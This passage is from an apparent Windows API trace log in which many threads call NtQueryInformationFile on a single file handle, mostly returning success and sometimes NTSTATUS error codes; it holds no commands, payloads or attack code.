FileHandle=0x194, IoStatusBlock=0x359fa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa28, FileInformation=0x210e20) returned 0x0 Thread: id = 956 os_tid = 0xb70 [0163.049] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe08, FileInformation=0x210e20) returned 0x0 Thread: id = 957 os_tid = 0xb6c [0163.054] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa10, FileInformation=0x210e20) returned 0x0 Thread: id = 958 os_tid = 0xb74 [0163.056] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 959 os_tid = 0xb68 [0163.057] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd48, FileInformation=0x210e20) returned 0x0 Thread: id = 960 os_tid = 0x758 [0163.065] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb88, FileInformation=0x210e20) returned 0x0 Thread: id = 961 os_tid = 0x3d4 [0163.067] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe30, FileInformation=0x210e20) returned 0x0 Thread: id = 962 os_tid = 0x484 [0163.069] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc98, FileInformation=0x210e20) returned 0x0 Thread: id = 963 os_tid = 0xb4c [0163.070] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa70, FileInformation=0x210e20) returned 0x0 Thread: id = 964 os_tid = 0xa1c [0163.072] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd50, FileInformation=0x210e20) returned 0x0 Thread: id = 965 os_tid = 0x2ac [0163.074] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa70, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 966 os_tid = 0xa8c [0163.076] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 967 os_tid = 0x68c [0163.083] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8a0, FileInformation=0x210e20) returned 0x0 Thread: id = 968 os_tid = 0x388 [0163.085] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfdd8, FileInformation=0x210e20) returned 0x0 Thread: id = 969 os_tid = 0xa50 [0163.087] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff68, FileInformation=0x210e20) returned 0x0 Thread: id = 970 os_tid = 0x75c [0163.089] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f920, FileInformation=0x210e20) returned 0x0 Thread: id = 971 os_tid = 0x240 [0163.092] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fea8, FileInformation=0x210e20) returned 0x0 Thread: id = 972 os_tid = 0x320 [0163.093] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff70, FileInformation=0x210e20) returned 0x0 Thread: id = 973 os_tid = 0x3b4 [0163.099] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fbc0, FileInformation=0x210e20) returned 0x0 Thread: id = 974 os_tid = 0x760 [0163.104] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 975 os_tid = 0xb00 [0163.106] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd80, FileInformation=0x210e20) returned 0x0 Thread: id = 976 os_tid = 0x7fc [0163.108] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc48, FileInformation=0x210e20) returned 0x0 Thread: id = 977 os_tid = 0xb18 [0163.110] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fcb8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 978 os_tid = 0xa68 [0163.112] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fda0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 979 os_tid = 0x224 [0163.115] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe50, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 980 os_tid = 0x2c4 [0163.118] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc48, FileInformation=0x210e20) returned 0x0 Thread: id = 981 os_tid = 0x24c [0163.120] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf878, FileInformation=0x210e20) returned 0x0 Thread: id = 982 os_tid = 0x4e8 [0163.122] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 983 os_tid = 0x220 [0163.124] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f880, FileInformation=0x210e20) returned 0x0 Thread: id = 984 os_tid = 0xb04 [0163.126] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbe8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 985 os_tid = 0x180 [0163.128] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f8a8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 986 os_tid = 0x53c [0163.130] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9b8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 987 os_tid = 0x5b4 [0163.132] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9f8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 988 os_tid = 0x614 [0163.134] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fcb8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 989 os_tid = 0x690 [0163.136] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa58, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 990 os_tid = 0x440 [0163.138] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffa20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffa20, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 991 os_tid = 0x7d8 [0163.140] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc20, FileInformation=0x210e20) returned 0x0 Thread: id = 992 os_tid = 0xa60 [0163.142] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff70, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 993 os_tid = 0xb24 [0163.144] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc20, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 994 os_tid = 0x878 [0163.146] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfce0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfce0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 995 os_tid = 0xb1c [0163.148] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc18, FileInformation=0x210e20) returned 0x0 Thread: id = 996 os_tid = 0xb08 [0163.150] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff990, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 997 os_tid = 0x4fc [0163.151] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff878, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 998 os_tid = 0x4dc [0163.153] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffcd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffcd8, FileInformation=0x210e20) returned 0x0 Thread: id = 999 os_tid = 0x43c [0163.155] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1000 os_tid = 0x1c4 [0163.162] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd40, FileInformation=0x210e20) returned 0x0 Thread: id = 1001 os_tid = 0xbec [0163.168] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f788, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f788, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1002 os_tid = 0xb48 [0163.172] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f930, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f930, FileInformation=0x210e20) returned 0x0 Thread: id = 1003 os_tid = 0x5bc [0163.174] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1004 os_tid = 0x6b8 [0163.177] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1005 os_tid = 0x2dc [0163.179] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1006 os_tid = 0x158 [0163.189] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff18, FileInformation=0x210e20) returned 0x0 Thread: id = 1007 os_tid = 0x6cc [0163.198] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe60, FileInformation=0x210e20) returned 0x0 Thread: id = 1008 os_tid = 0x694 [0163.203] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff68, FileInformation=0x210e20) returned 0x0 Thread: id = 1009 os_tid = 0x6d8 [0163.208] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1010 os_tid = 0x87c [0163.210] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1011 os_tid = 0xb88 [0163.212] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa08, FileInformation=0x210e20) returned 0x0 Thread: id = 1012 os_tid = 0xb8c [0163.214] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f990, FileInformation=0x210e20) returned 0x0 Thread: id = 1013 os_tid = 0x700 [0163.216] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1014 os_tid = 0x6f0 [0163.221] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fda0, FileInformation=0x210e20) returned 0x0 Thread: id = 1015 os_tid = 0x130 [0163.222] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc50, FileInformation=0x210e20) returned 0x0 Thread: id = 1016 os_tid = 0x754 [0163.224] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1017 os_tid = 0x72c [0163.235] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd70, FileInformation=0x210e20) returned 0x0 Thread: id = 1018 os_tid = 0x748 [0163.241] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe08, FileInformation=0x210e20) returned 0x0 Thread: id = 1019 os_tid = 0x928 [0163.243] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc70, FileInformation=0x210e20) returned 0x0 Thread: id = 1020 os_tid = 0xcc [0163.245] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffdb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffdb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1021 os_tid = 0xd0 [0163.247] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1022 os_tid = 0xd4 [0163.249] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc70, FileInformation=0x210e20) returned 0x0 Thread: id = 1023 os_tid = 0xd8 [0163.252] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc28, FileInformation=0x210e20) returned 0x0 Thread: id = 1024 os_tid = 0xdc [0163.261] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa88, FileInformation=0x210e20) returned 0x0 Thread: id = 1025 os_tid = 0xe0 [0163.267] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffaf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffaf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1026 os_tid = 0xe4 [0163.270] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 1027 os_tid = 0xe8 [0163.272] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fec8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fec8, FileInformation=0x210e20) returned 0x0 Thread: id = 1028 os_tid = 0xec [0163.274] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe90, FileInformation=0x210e20) returned 0x0 Thread: id = 1029 os_tid = 0x9d8 [0163.276] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea8, FileInformation=0x210e20) returned 0x0 Thread: id = 1030 os_tid = 0x898 [0163.279] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1031 os_tid = 0x48c [0163.283] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f888, FileInformation=0x210e20) returned 0x0 Thread: id = 1032 os_tid = 0x6a4 [0163.285] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb98, FileInformation=0x210e20) returned 0x0 Thread: id = 1033 os_tid = 0x20c [0163.287] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff68, FileInformation=0x210e20) returned 0x0 Thread: id = 1034 os_tid = 0x704 [0163.289] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1035 os_tid = 0x568 [0163.291] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff08, FileInformation=0x210e20) returned 0x0 Thread: id = 1036 os_tid = 0x5ac [0163.293] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffba8, FileInformation=0x210e20) returned 0x0 Thread: id = 1037 os_tid = 0x908 [0163.295] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe40, FileInformation=0x210e20) returned 0x0 Thread: id = 1038 os_tid = 0x888 [0163.301] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df850, FileInformation=0x210e20) returned 0x0 Thread: id = 1039 os_tid = 0x544 [0163.303] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf828, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf828, FileInformation=0x210e20) returned 0x0 Thread: id = 1040 os_tid = 0x76c [0163.305] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f918, FileInformation=0x210e20) returned 0x0 Thread: id = 1041 os_tid = 0xa9c [0163.307] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfaa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfaa8, FileInformation=0x210e20) returned 0x0 Thread: id = 1042 os_tid = 0x114 [0163.309] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1043 os_tid = 0x5b8 [0163.310] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd98, FileInformation=0x210e20) returned 0x0 Thread: id = 1044 os_tid = 0x814 [0163.312] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f878, FileInformation=0x210e20) returned 0x0 Thread: id = 1045 os_tid = 0x834 [0163.317] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fcc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fcc0, FileInformation=0x210e20) returned 0x0 Thread: id = 1046 os_tid = 0x884 [0163.319] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1047 os_tid = 0x5d4 [0163.322] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fdc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fdc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1048 os_tid = 0x340 [0163.324] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1049 os_tid = 0x810 [0163.327] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1050 os_tid = 0x830 [0163.329] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff908, FileInformation=0x210e20) returned 0x0 Thread: id = 1051 os_tid = 0x880 [0163.331] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc00, FileInformation=0x210e20) returned 0x0 Thread: id = 1052 os_tid = 0xae4 [0163.333] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1053 os_tid = 0x570 [0163.335] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1054 os_tid = 0xb40 [0163.336] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffde0, FileInformation=0x210e20) returned 0x0 Thread: id = 1055 os_tid = 0x5f4 [0163.339] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1056 os_tid = 0xbb8 [0163.341] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1057 os_tid = 0x598 [0163.343] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fae0, FileInformation=0x210e20) returned 0x0 Thread: id = 1058 os_tid = 0x4e4 [0163.345] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f850, FileInformation=0x210e20) returned 0x0 Thread: id = 1059 os_tid = 0xbfc [0163.347] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdc0, FileInformation=0x210e20) returned 0x0 Thread: id = 1060 os_tid = 0x80c [0163.351] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363faf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363faf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1061 os_tid = 0xbf8 [0163.353] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe88, FileInformation=0x210e20) returned 0x0 Thread: id = 1062 os_tid = 0x524 [0163.357] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1063 os_tid = 0x674 [0163.360] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd20, FileInformation=0x210e20) returned 0x0 Thread: id = 1064 os_tid = 0x4a0 [0163.362] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1065 